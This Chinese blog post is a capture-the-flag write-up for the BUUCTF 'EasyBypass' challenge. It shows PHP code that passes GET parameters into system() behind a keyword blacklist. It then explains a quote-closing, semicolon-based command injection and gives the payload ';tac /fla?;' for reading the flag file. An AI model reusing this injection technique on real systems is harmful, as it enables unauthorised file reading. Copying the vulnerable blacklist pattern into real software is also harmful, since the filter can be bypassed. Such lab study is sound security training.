buuctf EasyBypass --不会编程的崽

于 2024-03-08 07:00:00 发布
阅读量601 收藏 9
点赞数 14
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136529039
版权

buu后边的题有些确实难,有些其实也没那么复杂。昨天做一道异或绕过的题,现在还没看懂QAQ

先来一题简单的吧。哎,随缘更新吧

<?php

highlight_file(__FILE__);

$comm1 = $_GET['comm1'];
$comm2 = $_GET['comm2'];


if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
    $comm1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|\||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))
    $comm2 = "";

$flag = "#flag in /flag";

$comm1 = '"' . $comm1 . '"';
$comm2 = '"' . $comm2 . '"';

$cmd = "file $comm1 $comm2";
system($cmd);
?>

代码很简单过滤一些符号与关键字。但是最后system执行的是file命令。file命令作用大致是查看文件类型。首先可考虑到命令连接符。这里应该就是";"

可以传入两个参数,因为俩参数都会连接上双引号,先要进行双引号闭合。这样一看似乎第二个参数就不需要了

$cmd = "file $comm1 $comm2";
--输入a,b-->
$cmd = " file "a" "b" ";
--输入"a","b"-->
$cmd = " file ""a"" ""b"" ";
--将a替换为;tac /fla?;-->
$cmd = " file "";tac /fla?;"" ""b"" ";
--丢弃b参数也可以-->
$cmd = " file "";tac /fla?;"" "" ";

千万不能少了后边的双引号与分号,要闭合完整,才能执行恶意命令
最后的payload很简单了
?comm1=";tac%20/fla?;"

还挺简单的

不会编程的崽
关注
  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buu-EasyBypass
qaq517384的博客
10-27 612
考点: linux分号执行多条命令 ?正则匹配flag 打开环境 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep
EasyBypass (;管道符)
qq_62046696的博客
12-23 1279
肯定要把file从命令中注释掉这种,以前接触过闭合然后自己重新构造一个🐎,但是这里好像管道符也可以使用;这样就成功闭合掉了,然后其实还有一个疑问就是我cat /f*的时候也能用,可是|\*|\。这个也就是给传入的参数加了一个引号包起来,然后往上继续查看过滤的字符号剩下什么。如果是 新生类的话,system那里应该换为 new a(b)这种的形式,分号还有,并且tac也没 过滤,flag被过滤掉了但是可以用?报错了查看信息是引号的问题,我们还需要闭合掉引号不然就变成了。就需要我们自己写入闭合。
EasyBypass
qq_54929891的博客
06-23 647
哈哈哈
BUUCTF--EasyBypass
qq_46263951的博客
08-15 799
题目给出代码 <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))
BUUCTF WEB EASY_BYPASS1
qq_41696858的博客
10-17 344
打开场景,直接给了源码,代码审计,没啥好说的,两个get,一个post,很常规的md5数组绕过,post过去的passwd 数字字符弱相等 $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) {
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在PHP编程中,变量覆盖漏洞是一种常见的安全问题,它允许攻击者通过自定义的参数值替换原有的变量值,从而可能导致敏感信息泄露或者执行非法操作。这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: 在...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
最新发布
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
[BUUCTF][web][p5]Easybypass
qq_29060627的博客
03-26 4381
<?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $comm1 = "".
BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 9890
BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
[BUUCTF]Easybypass
lllffg的博客
04-16 1308
EasyBypass <?php highlight_file(__FILE__); $comm1 = $_GET['comm1']; $comm2 = $_GET['comm2']; if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $
八月刷题总结
qq_46263951的博客
08-31 481
2021DASCTF July X CBCTF--cat flag 考察日志文件位置,escapeshellarg函数绕过 DASCTF July X CBCTF 4th--ezrceYAPI Mock远程代码执行漏洞 BUUCTF--[HarekazeCTF2019]Easy Notes SESSION反序列化 BUUCTF--[SWPU2019]Web3 伪造Session,生成linux中的软链接 BUUCTF--[watevrCTF-2019]Pickle Store Pickle反序列化漏
BUUCTF刷题记录(第一页和第二页部分题)
weixin_51943950的博客
05-15 675
这个 晚上总算补完了所有的简易wp,二刷了一部分题目。 小白做题,大佬勿喷。。 [极客大挑战 2019]EasySQL 猜对用户名admin,判断密码框存在注入,直接万能密码,或者随意查询一下 [HCTF 2018]WarmUp 代码审计典型例题,两个if判断需要false,最后一个需要true,最后通过文件包含漏洞查看,还是较为简单的题目 [极客大挑战 2019]Havefun …就传个参 [ACTF2020 新生赛]Include 文件包含 伪协议 [强网杯 2019]随便注 本题
Writeup-北邮新生赛MRCTF-Web题:ez_bypass
Y5neKO's blog
10-16 526
原题地址:https://merak-ctf.site/challenges#ez_bypass 首先从题目可以看出:easy_bypass,简单的绕过 我们打开题目地址,简单的展示了源码的一部分 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET[
[RoarCTF 2019]Easy Calc(http走私 && 利用PHP的字符串解析特性Bypass)
a3320315的博客
11-06 3912
0x01 题目描述 打开题目如上图所示,有点像国赛的love_math F12查看源码 提示有waf和一个calc.php网页,我们先打开这个网页看看是什么 打开后直接给出了源码,我们可以看见过滤了一些特殊字符,然后eval执行我们的命令,想着前面的waf,不可能是这样简单的,我们先试试传入一些字符试试。 当我传入字符时,waf拦截了我们的请求 题目的突破点: 只能传入数字和运算符号,不能...
buuctf刷题
qq_41788704的博客
10-28 1751
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
BUUCTF刷题记录(6)
bmth666的博客
05-14 6759
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
『CTF Web复现』BUUCTF-[蓝帽杯 2021]One Pointer PHP
Ho1aAs‘s Blog
09-01 1767
利用点: serialize反序列化 数组索引整型溢出 bypass open_basedir FPM/FastCGI bypass disable_functions反弹shell suid提权
buuctf upload-labs-linux
05-21
buuctf upload-labs-linux 是一个基于 Linux 平台的上传漏洞实验室,旨在帮助安全从业人员学习上传漏洞的原理和利用方法。该实验室提供了多个不同难度级别的漏洞场景,用户可以通过上传恶意文件、绕过文件类型限制、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值